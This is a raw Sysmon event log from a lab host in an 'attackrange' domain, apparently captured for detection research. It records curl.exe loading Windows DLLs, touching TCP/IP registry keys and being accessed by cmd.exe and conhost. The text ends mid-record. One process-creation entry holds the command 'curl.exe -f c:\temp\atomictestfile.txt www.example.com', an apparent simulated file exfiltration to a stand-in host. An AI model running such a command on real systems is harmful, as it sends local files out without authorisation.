734700x800000000000000055298251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000055298250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.434{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000055298249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.432{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000055298248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.429{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055298247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.428{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055298246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055298245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055298244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055298243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055298242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055298241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055298240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055298239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055298238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055298237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055298236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055298235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055298234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055298233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055298232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055298231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-92C8-616D-4F11-01000000F101}53165996C:\Windows\system32\conhost.exe{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055298230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055298229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000055298228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000055298227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000055298226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.412{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000055298225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.397{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055298224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.397{8B6011A9-92C8-616D-4E11-01000000F101}68126400C:\Windows\system32\cmd.exe{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055298223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:39.372{8B6011A9-E59F-618B-AFA5-04000000F101}3300C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.execurl.exe -f c:\temp\atomictestfile.txt www.example.comc:\Temp\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-92C8-616D-4E11-01000000F101}6812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 534500x800000000000000055301764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.230{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exe 734700x800000000000000055301763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000055301762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000055301761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000055301757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x800000000000000055301756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055301754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000055301753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000055301752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000055301751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000055301750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055301749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055301748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055301747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.168{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055301746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.167{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055301745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.166{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055301744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.166{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055301743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.166{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055301742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.166{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055301741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.166{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055301740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.165{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055301739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.165{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055301738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.165{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055301737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.165{8B6011A9-E696-618B-D4A5-04000000F101}5796C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055301736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 